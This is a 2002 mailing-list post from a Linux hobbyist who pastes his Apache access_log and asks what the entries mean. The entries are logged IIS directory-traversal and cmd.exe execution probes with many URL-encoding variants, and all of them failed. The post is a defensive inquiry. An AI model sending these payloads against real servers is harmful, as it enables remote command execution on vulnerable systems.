access_log
Todd Lee
todd at LANtech-HI.com
Mon Jan 28 13:00:59 PST 2002
Hey everyone,
I was wondering if anyone out there could help me with understanding my
access_log for httpd. I was looking through it after setting a new RH7.2
box with monmotha's firewall script and the latest rpms from RHN. I just
host my band's website and e-mail. Anyway, I got these entries that I don't
quite understand. It looks like someone was trying to run something on the
box, just wondering how to interpret these. I changed the IP...just in case
I'm wrong and this is totally innocent, hate to give out people IP's
unnecessarily...
24.--.--.--7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 317
24.--.--.--7 - - [28/Jan/2002:05:01:02 -1000] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 315
24.--.--.--7 - - [28/Jan/2002:05:01:29 -1000] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
24.--.--.--7 - - [28/Jan/2002:05:01:48 -1000] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
24.--.--.--7 - - [28/Jan/2002:05:02:06 -1000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.--.--.--7 - - [28/Jan/2002:05:02:25 -1000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 356
24.--.-.--7 - - [28/Jan/2002:05:02:47 -1000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 356
24.--.-.--7 - - [28/Jan/2002:05:03:27 -1000] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 372
24.--.--.--7 - - [28/Jan/2002:05:03:46 -1000] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.--.--.--7 - - [28/Jan/2002:05:03:47 -1000] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.--.--.--7 - - [28/Jan/2002:05:04:06 -1000] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.--.--.--7 - - [28/Jan/2002:05:04:27 -1000] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.--.--.--7 - - [28/Jan/2002:05:04:31 -1000] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
24.--.--.--7 - - [28/Jan/2002:05:04:35 -1000] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
24.--.--.--7 - - [28/Jan/2002:05:04:54 -1000] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.---.--.--7 - - [28/Jan/2002:05:05:12 -1000] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
Thanks!
-Todd
More information about the LUAU
mailing list